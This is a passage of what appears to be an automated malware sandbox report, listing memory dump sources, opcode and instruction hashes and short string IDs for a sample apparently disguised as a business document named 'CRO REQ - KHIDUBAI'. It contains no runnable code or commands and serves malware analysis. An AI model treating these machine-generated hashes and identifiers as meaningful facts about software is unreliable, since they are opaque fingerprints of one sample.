                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: p<p
                                                                                                                                                    • API String ID: 0-2671882351
                                                                                                                                                    • Opcode ID: e9f2b76b58bac6c0fccc4ca26da5f4be04721a380e49e9ce1b07e45d9a1460fb
                                                                                                                                                    • Instruction ID: b5728053e8a5e32da8459daaea5a4237ea98f8e5c446538df1b0a8be917faaab
                                                                                                                                                    • Opcode Fuzzy Hash: e9f2b76b58bac6c0fccc4ca26da5f4be04721a380e49e9ce1b07e45d9a1460fb
                                                                                                                                                    • Instruction Fuzzy Hash: 5631C2712442849FCB16CF29C8909EB7FF6AF4A314F190096F855CB3A2CA36DC52CB61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 4'p
                                                                                                                                                    • API String ID: 0-481844870
                                                                                                                                                    • Opcode ID: 02854970336768e3093bf5e9329cdef9c9eaa11fc3fdad9b60044679d9f18c21
                                                                                                                                                    • Instruction ID: dae5acb2dd8fa7645e001cc3d6bf74fc88c0d8ecc955b732e2d67fbbb5ba2f40
                                                                                                                                                    • Opcode Fuzzy Hash: 02854970336768e3093bf5e9329cdef9c9eaa11fc3fdad9b60044679d9f18c21
                                                                                                                                                    • Instruction Fuzzy Hash: 8E2176307063584BC716766684606BFA797DFC2754B1A467FD209DB386CEB88C4683CE
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.420080510.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_7d0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: TJp
                                                                                                                                                    • API String ID: 0-1978589728
                                                                                                                                                    • Opcode ID: 58390d580b22cc821e3997d95faf6828e27da5e9ac3f0013670e04985949694c
                                                                                                                                                    • Instruction ID: 01add8eafedb37a406052f68c6bddbaeb4c0705053ab6e7012c7632cf3cd4470
                                                                                                                                                    • Opcode Fuzzy Hash: 58390d580b22cc821e3997d95faf6828e27da5e9ac3f0013670e04985949694c
                                                                                                                                                    • Instruction Fuzzy Hash: A33125753001009FC754DB68D868B2ABBF2EF89715F1601AAE50ACB3B2CA71EC05CB51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: ,p
                                                                                                                                                    • API String ID: 0-2091407873
                                                                                                                                                    • Opcode ID: f72c4d4aa0de3ffd43779505f26e7bc895d4e2a1c477d2b4acddf65b2adc4824
                                                                                                                                                    • Instruction ID: bdea3834e432b344c0169fed60d57e321c080052f2692e45d4ee59296ad585c0
                                                                                                                                                    • Opcode Fuzzy Hash: f72c4d4aa0de3ffd43779505f26e7bc895d4e2a1c477d2b4acddf65b2adc4824
                                                                                                                                                    • Instruction Fuzzy Hash: 79317071A40128CFC7299B98C956BED7BB3BF88310F15429AE5059B3A1CB70DD41CF61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: xp
                                                                                                                                                    • API String ID: 0-2915346237
                                                                                                                                                    • Opcode ID: 2af37008c13c71bfd8381259e17ea20673a1ae6682f01db3fa6cb163c0ec3fc7
                                                                                                                                                    • Instruction ID: d4f7be82f09977ef4160a7004146b7f804cfea68adf5d5f3ca2121b11a5b82ae
                                                                                                                                                    • Opcode Fuzzy Hash: 2af37008c13c71bfd8381259e17ea20673a1ae6682f01db3fa6cb163c0ec3fc7
                                                                                                                                                    • Instruction Fuzzy Hash: 13315034A092089FCB14DFA9D845BEEBBF2FF88310F14806AD505A7345D730AA85CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 4'p
                                                                                                                                                    • API String ID: 0-481844870
                                                                                                                                                    • Opcode ID: 37617fa5da1a35c7c0873312cda0621ec3116d70d335da02f48b920404dcd97e
                                                                                                                                                    • Instruction ID: 5bc2588f5b31a789685910c4c92cc5c6a04018d487328f6da49bc77a9cf5be78
                                                                                                                                                    • Opcode Fuzzy Hash: 37617fa5da1a35c7c0873312cda0621ec3116d70d335da02f48b920404dcd97e
                                                                                                                                                    • Instruction Fuzzy Hash: 74115931705B559FDB26162854202BFA797DFD2311B1800BFDB45DB382CD298C47839B
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: @)R
                                                                                                                                                    • API String ID: 0-1324940257
                                                                                                                                                    • Opcode ID: 30e8c96fb1a9dd1b930f91c6783c1ef93417c6a032804fe1687b26d86b1c4353
                                                                                                                                                    • Instruction ID: 47f0b9479c0120a116722055f2d3f6377951bf614404ba32b2f93d27ab3992d2
                                                                                                                                                    • Opcode Fuzzy Hash: 30e8c96fb1a9dd1b930f91c6783c1ef93417c6a032804fe1687b26d86b1c4353
                                                                                                                                                    • Instruction Fuzzy Hash: BE217135A002589FCB158F68C8549EE7FF2EF8D320F188569E411AB3A0DB758C86DF90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: LRp
                                                                                                                                                    • API String ID: 0-3405495957
                                                                                                                                                    • Opcode ID: 75d12156329043da933403285519238ad3b673723dff6af4cd53f78105d9eec9
                                                                                                                                                    • Instruction ID: adf3a846129bde34356f9d8a53a879d2e942ba2d5acd0fbd166a9913447d1a31
                                                                                                                                                    • Opcode Fuzzy Hash: 75d12156329043da933403285519238ad3b673723dff6af4cd53f78105d9eec9
                                                                                                                                                    • Instruction Fuzzy Hash: 61218672B051255BDF149A78DC581EE73639FD820671A8E3AD4026F389CD786C09DBD1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (p
                                                                                                                                                    • API String ID: 0-4175582459
                                                                                                                                                    • Opcode ID: 5f5791ade029b9074ccd539cc80086dd0b4fd7f4299af76ac4bced5bd7dbb684
                                                                                                                                                    • Instruction ID: d4833e78cb50a99f66e4adb783fb20e3ef82a1a6a0dbbb158e57ae534da562a7
                                                                                                                                                    • Opcode Fuzzy Hash: 5f5791ade029b9074ccd539cc80086dd0b4fd7f4299af76ac4bced5bd7dbb684
                                                                                                                                                    • Instruction Fuzzy Hash: 5D217F36609254AFC7068F68E814C997FB6EF8A32031A81DAE505DF273C636DC16DB52
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: V
                                                                                                                                                    • API String ID: 0-1342839628
                                                                                                                                                    • Opcode ID: b55b9035ffcf538bc91ae81f5960a23c8f728bacb0c6a7fc8df298b58cbb8a29
                                                                                                                                                    • Instruction ID: c24464bc0c8b994bbef546aaed6b5291e0f1425b20e2493a8fe78aae318f2528
                                                                                                                                                    • Opcode Fuzzy Hash: b55b9035ffcf538bc91ae81f5960a23c8f728bacb0c6a7fc8df298b58cbb8a29
                                                                                                                                                    • Instruction Fuzzy Hash: A321CC317082508FD7116B29EC087667BE8DF85315F4A50B6C6448B642E370FC41C782
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: D@R
                                                                                                                                                    • API String ID: 0-4258169811
                                                                                                                                                    • Opcode ID: 40f8a380d08577f6a1190025141989140dd9dcefcd1a07f3d7bfc4e6e254c125
                                                                                                                                                    • Instruction ID: 0d73639dabe4f97a7832b09daa5f1efab8a341ec6d6e08c615ea3747bdfe69d4
                                                                                                                                                    • Opcode Fuzzy Hash: 40f8a380d08577f6a1190025141989140dd9dcefcd1a07f3d7bfc4e6e254c125
                                                                                                                                                    • Instruction Fuzzy Hash: 4811C6B1A882455FCB3E8764AC586EF7FA29B86355F1480AAD606C72D1EF744986CA00
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.420080510.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_7d0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: TJp
                                                                                                                                                    • API String ID: 0-1978589728
                                                                                                                                                    • Opcode ID: d0b507ced8f5a0f6cfdd6100cd4de8c5630a1eb88125dff3a4e09b2ca8cb986c
                                                                                                                                                    • Instruction ID: f4cb9dba2771b1f4727916aef54609116049a67c849b4cbec6c21e4a6ded109e
                                                                                                                                                    • Opcode Fuzzy Hash: d0b507ced8f5a0f6cfdd6100cd4de8c5630a1eb88125dff3a4e09b2ca8cb986c
                                                                                                                                                    • Instruction Fuzzy Hash: 6C012B303042409BD325B7A4E45537E7BA2AFC4311F54056BD0028B756CE699D0883A2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.418758880.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_1e0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                    • Opcode ID: 257a8718549087456d32a2c8646ba6a1641dcd27cfb452124e6a6b829d31d372
                                                                                                                                                    • Instruction ID: 5b2e9ea4402f34644aa8f75dc6e2e53cf6b1c89771156171340120ebc9137de6
                                                                                                                                                    • Opcode Fuzzy Hash: 257a8718549087456d32a2c8646ba6a1641dcd27cfb452124e6a6b829d31d372
                                                                                                                                                    • Instruction Fuzzy Hash: C3112871D003488BCB10DFAAD9487EEFBF5EB88324F248819D415A7344C775A944CBA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (p
                                                                                                                                                    • API String ID: 0-4175582459
                                                                                                                                                    • Opcode ID: c02f9c4c3e676e886c619416fc0df0ceb59e7897b7d084f8b40adb0f7d6d5155
                                                                                                                                                    • Instruction ID: c4b5534e69bec241ff6887c5eb962122c4f63575ba837507322ffe1e75b42625
                                                                                                                                                    • Opcode Fuzzy Hash: c02f9c4c3e676e886c619416fc0df0ceb59e7897b7d084f8b40adb0f7d6d5155
                                                                                                                                                    • Instruction Fuzzy Hash: EFF0A4213506205BD72D2329A8217BF3ADB8BC5754F14817BE906CB7C6CE298D0783D6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: LER
                                                                                                                                                    • API String ID: 0-2393515566
                                                                                                                                                    • Opcode ID: 17764b8ba2485692ca2073ac23c3190d8f745ef1ac92861c2cf436b0bac6eb90
                                                                                                                                                    • Instruction ID: c063e841ee87af717c6527fa485313398e2a04ed2e2002d8d81d04ec3427f849
                                                                                                                                                    • Opcode Fuzzy Hash: 17764b8ba2485692ca2073ac23c3190d8f745ef1ac92861c2cf436b0bac6eb90
                                                                                                                                                    • Instruction Fuzzy Hash: 83E0EC70A01308EFDB00EFA4E95176DBBA9EF85200F5085A9E8059B245D9715F059B91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: D@R
                                                                                                                                                    • API String ID: 0-4258169811
                                                                                                                                                    • Opcode ID: b7d0b649c94333d2a08012a0ea363fc9172d9288fc114e69b53ce1d2a8cd1b3b
                                                                                                                                                    • Instruction ID: eba104b1d6b4b038ae7be7e8b940bf82e3c16beec31b68a854b80b8e1704544f
                                                                                                                                                    • Opcode Fuzzy Hash: b7d0b649c94333d2a08012a0ea363fc9172d9288fc114e69b53ce1d2a8cd1b3b
                                                                                                                                                    • Instruction Fuzzy Hash: D7E01270A0030DEFC700DFA4E90569D7BF5EF45300F5045A9D509D7345D9355F059B91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: "b
                                                                                                                                                    • API String ID: 0-1171739819
                                                                                                                                                    • Opcode ID: 13adf03f77602c0c3e7c2c80fe5063b2d77d7df7e3188e868aa290d3e6bd85f2
                                                                                                                                                    • Instruction ID: 5ff69fd9c958cd8da4468580abe16b7ab7a038a7ed37ff9a98d0a1f664a9a2db
                                                                                                                                                    • Opcode Fuzzy Hash: 13adf03f77602c0c3e7c2c80fe5063b2d77d7df7e3188e868aa290d3e6bd85f2
                                                                                                                                                    • Instruction Fuzzy Hash: 2BD02E3020C2802FC301C624E821825BF718FA520030880AEEC08CB283E0239D1ACB00
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c931270d9bdc89f812614e92d2975cdf4803799f16345cd31ab5d94097073e93
                                                                                                                                                    • Instruction ID: 0549edf6692af03e27d3ca3b803b953b698cdf00eef47b56a7a9bed59b16390c
                                                                                                                                                    • Opcode Fuzzy Hash: c931270d9bdc89f812614e92d2975cdf4803799f16345cd31ab5d94097073e93
                                                                                                                                                    • Instruction Fuzzy Hash: 65025370A0061ACBDB24DF54C850BFEB7B2AF94300F60859ADA09B7740DBB49E85DF95
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b41eb8538be4aa81362e8ae395a0c6ac5d47448adf28672e9a661e9626248282
                                                                                                                                                    • Instruction ID: a481bfcfa0a5b86d35b434d391c7b8b214b1bb953a725a698ceccda8b68ef7f0
                                                                                                                                                    • Opcode Fuzzy Hash: b41eb8538be4aa81362e8ae395a0c6ac5d47448adf28672e9a661e9626248282
                                                                                                                                                    • Instruction Fuzzy Hash: 3EE17231B44204DFDB18DF64D895BAEBBA2AF88310F148069E905DB3D2DB75ED45CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 9ee36d3392dc6e917268180cdbccdb70d7ef3e066fd9b7ea9b0baa0a745d31df
                                                                                                                                                    • Instruction ID: 047290bf72f44aa2b80b0eed704df02d6723bcd1bf67fcf3c43a1f0fa97c34c6
                                                                                                                                                    • Opcode Fuzzy Hash: 9ee36d3392dc6e917268180cdbccdb70d7ef3e066fd9b7ea9b0baa0a745d31df
                                                                                                                                                    • Instruction Fuzzy Hash: FAC1823030224587E7186BDD98A873BE6FAAFE5701F10513FA706C73E9CEA49D099761
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 8d61a3514079f167dcd9df914a850ec78debf5346799d5c0b03a7dfd5fe31e74
                                                                                                                                                    • Instruction ID: 8446a6ea7c04ed07d4b5d27ff08a1b515820af0cb9498396c0411d0b335fde7f
                                                                                                                                                    • Opcode Fuzzy Hash: 8d61a3514079f167dcd9df914a850ec78debf5346799d5c0b03a7dfd5fe31e74
                                                                                                                                                    • Instruction Fuzzy Hash: DEB1C6703007059BEB50699AC4D177FE1DBAFD1701FA4093FAB0587299CEF88D854AAB
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 8d4a54e258c640dd37273d9b68aa1cb3ba88525e3ea89ce89088df103fb1ee6f
                                                                                                                                                    • Instruction ID: 53e8f23ddb27e37772222ace7e12f48a97630c38c10df9fabdd80a9ad64d5fc3
                                                                                                                                                    • Opcode Fuzzy Hash: 8d4a54e258c640dd37273d9b68aa1cb3ba88525e3ea89ce89088df103fb1ee6f
                                                                                                                                                    • Instruction Fuzzy Hash: 80A10D34B002148FDB58DF24C994B9AB7B2BF89310F5485A9E54AAB3A6DF709DC5CF40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 6623a956cdcda9aeb0a329f4d25a16dfc79a08219818084574e266a4e6ef25e2
                                                                                                                                                    • Instruction ID: bdc9fc6bfd90411dac130d5e3675403ad95aa142fd77a31745effdfe257128b3
                                                                                                                                                    • Opcode Fuzzy Hash: 6623a956cdcda9aeb0a329f4d25a16dfc79a08219818084574e266a4e6ef25e2
                                                                                                                                                    • Instruction Fuzzy Hash: 6C81DD71B042098FDB04DFA4D898AEEBBF2EB99304F149066D505DB291E734BE46CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 87366cb52a9eba464a3449ad12b4eda11c91fbb16f6f1b07e464a412472fa8f6
                                                                                                                                                    • Instruction ID: 1af23a1ea84456661b276f2469f6bb7fa533ecebe5b5b6848030bba5724e2870
                                                                                                                                                    • Opcode Fuzzy Hash: 87366cb52a9eba464a3449ad12b4eda11c91fbb16f6f1b07e464a412472fa8f6
                                                                                                                                                    • Instruction Fuzzy Hash: 6E812A347502149FCB58DF68D894AAE77F6EF89710F1481A9E506DB3A6CB30EC42CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 850499c2d0fe70e6f742b953422e436c79e8ded99d312c95a5a27f2de826a68b
                                                                                                                                                    • Instruction ID: c239b8773a69a24cb18d3a7940d7c319d2f3ce4af1a57fc6c9b17b453e657216
                                                                                                                                                    • Opcode Fuzzy Hash: 850499c2d0fe70e6f742b953422e436c79e8ded99d312c95a5a27f2de826a68b
                                                                                                                                                    • Instruction Fuzzy Hash: E2811C75A40614DFCB18DF68C484A9EB7F6FF88310B158169E855DB3A1DB30ED46CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d534fc9209a798c496e3c46be1d109f3880b3cc4fcba1c6683095478f0505b2c
                                                                                                                                                    • Instruction ID: 992d381b973411d9fe4467ba5c7adb5040d08383606b12f15971b914b5b3f195
                                                                                                                                                    • Opcode Fuzzy Hash: d534fc9209a798c496e3c46be1d109f3880b3cc4fcba1c6683095478f0505b2c
                                                                                                                                                    • Instruction Fuzzy Hash: 6B712934B00614CFCB19EF68C454AADB7B3BF89700F24856DE4069B3A2CB759D86DB84
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d923a3c8f551a007bd8add960f563930e6aee257f38179b2fb77bb28a126017b
